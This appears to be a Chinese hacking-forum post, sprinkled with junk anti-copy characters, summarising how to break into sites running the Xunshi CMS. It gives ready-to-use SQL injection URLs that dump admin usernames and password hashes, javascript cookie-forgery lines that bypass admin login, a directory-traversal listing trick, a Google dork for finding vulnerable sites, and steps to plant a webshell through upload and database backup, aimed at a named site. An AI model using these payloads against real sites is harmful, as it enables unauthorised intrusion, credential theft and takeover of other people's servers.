讯时漏洞总结

admin

by:血封忆尘
% [! S$ f$ q4 O7 e- _! z0 m  @+ |, {4 @4 H
; |( C: o) V- V5 s在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）
* ?  |: G" ~, E/ s  ]% @7 C
以下本文总结来自黑防去年第9期杂志上的内容...

先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
+ K" t  S$ T8 t; `! i# X2 g
# z" g; [% m+ q5 S记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入

. p5 f! F' u  I+ |, S0 E& @9 W$ A效果如图:
$ @& h6 @+ ]3 {
7 q# V: _# K' I  [
6 K6 K% {( m. [6 f
3 O) c- I& q( @. X6 k( E这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
( R/ ^3 y8 O# M6 |+ M
: O3 W" t" c. H! I2 @密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

& d3 ~2 o! r6 B% Y7 Ijavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));

那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
* ]2 R$ {) a. m. M* W/ `1 F: t
! q/ `3 I: _0 h0 v因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
- t7 Y& v. w) b/ r3 V0 Q
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
/ f& I8 Z8 e' t- [# l
访问这页面来列目录..步骤如下:
+ p! W! J& _6 X% w1 E
0 B- K7 w; a3 d. cjavascript:alert(document.cookie="admindj=1")

! D, \3 g7 y: c4 h' @http://www.political-security.co ... asp?id=46&dir=../..

效果如图:


  j4 X; u7 k/ _, M0 y
这样全站目录都能瞧了..找到后台目录..进去..
1 L! x8 _* O+ r5 R% h4 C) t- `
那么进了后台怎么拿shell？？上传--备份就ok了..

那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
" @( h9 R# f, K+ k
; E. U& H. A1 }4 C. d# u这个我也碰到过一次..你都可以通过列目录来实现..
8 D0 w8 `. \' @# J. U: D
javascript:alert(document.cookie="admindj=1")
$ c. h! S3 z; D' x/ d- s9 }) ~
9 a, u% i$ J8 Qhttp://www.political-security.co ... p?action=BackupData
. D2 a: {; S6 L0 P# B+ A
! b- v6 z$ V6 U. y备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
9 U/ z6 x1 H& I4 {" X( K% h  @; P
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
2 J) c( P8 l' r6 o1 v' p
然后访问此页面进行注入..步骤如下:
; ^: N( b' Z8 ?" z- e' U
' C/ h" N/ Z# Q. k; {+ `, I# Gjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
0 ?9 s  _; G1 p  Q6 ]
然后请求admin/admin_chk.asp页面
/ @0 o2 c8 E5 B6 U; \
' `+ a" z4 _0 k: b5 l% s输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
% O# J" S" E% K0 o: c# f
6 n3 ~+ k" R: g% o6 u" S/ C, N! [26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
  c! Q3 G9 |/ t; {
效果如图所示:


% T' ?$ r- j( e
讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
" w8 H1 q  W5 J" d0 [/ ^
1、/admin/admin_news_pl_view.asp?id=1
1 K- y% Y3 z, V7 @//id任意 填入以下语句

; a$ N+ V1 \1 B, e3 ~6 l2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
2 L4 P; a% c9 o5 _" ^# j( R

" _' U+ \, |+ ]/ y$ V' J
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
4 T1 q( Q& O% |+ n) p& H/ M/ _
4 ]' R+ N1 \1 M) z7 ]% q, A: s# d
, C4 X# X1 [5 `3 q
5 _, z0 Q: ~% P) ]( k7 i, B- Y- C5 `爆出管理员帐号和密码了
" X8 |+ {- B" ?. q  k$ i

! C2 H, m# Q! D
4、cookies进后台
, n+ `- u& I5 V' v
# g( ^3 u# D; Z: a, C9 Rjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
8 a' R; D) W6 R9 I1 w3 t
8 ^2 z; R: A9 z$ z3 j

  h2 y6 C. Q9 n2 U5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！

, `3 V+ R3 |! h
; A5 @( v0 C* u- ]$ T! ~
! k8 o9 |5 |8 n6、后台有上传和备份取SHELL不难。

- [$ [0 u1 c% [+ b7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
: p) V/ ?4 h  R2 d
9 o& [* E! ^1 v4 f: ]3 w% R逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！



9 c3 n" m8 j8 Z" S) p+ ]& R* m' o